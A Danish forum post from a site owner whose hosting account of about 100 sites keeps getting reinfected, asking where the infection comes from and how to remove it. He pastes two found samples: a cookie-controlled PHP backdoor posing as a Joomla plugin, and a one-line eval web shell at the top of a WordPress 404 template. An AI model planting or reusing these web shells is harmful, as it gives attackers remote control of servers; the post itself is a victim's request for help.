Webhotel med 100 domainer - Hack og Malware
Hej Alle sammenJeg har et webhotel med omkring 100 websites der køre. For omkring en månedstid siden fik jeg en mail fra min udbydere at de havde fundet malware.
Jeg slettede den instalation, og lage en frisk kopi op. I den forbindelse skiftede jeg alle password vedr mysql, ftp og kontoen til webhotellet.
I nat modtog jeg så en mail om at der var 3 andre websites der var ramt.
Ondsindede filer fundet på http://... .dk Malware er fundet i flg filer:
404.php
site_disabled_by_gigahost_due_to_spam/wp-content/themes/buttercream/404.php
wp-content/uploads/wysija/themes/main2/index.php
wp-content/uploads/wysija/themes/main2/index.php
Og ganske rigtigt...
I den ene fil:
<?php
/**
* @package Joomla.Plugin.System
* @since 1.5
*
*
*/
class PlgSysJoomla {
public function __construct() {
$file=@$_COOKIE['ljNqe3'];
if ($file){ $opt=$file(@$_COOKIE['ljNqe2']); $au=$file(@$_COOKIE['ljNqe1']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}}
$index=new PlgSysJoomla;
Og i den anden fil er dette:
<?php @eval($_POST['chopper']);?>
<?php get_header(); ?>
<div class="archive-container">
<h2>Error 404</h2>
Den side du kigger efter, findes desværre ikke mere.
</div>
<?php get_sidebar(); ?>
<?php get_footer(); ?>
Er der nogen der kan hjælpe mig med at give nogle svar om hvor det kommer fra, og hvordan jeg slipper af med det?
Jeg er lidt b
bange for at det ligger i en "uskyldig" fil et sted på webhotellet, og bare bliver ved med at kopiere sig selv igen og igen.
Mvh
Henrik
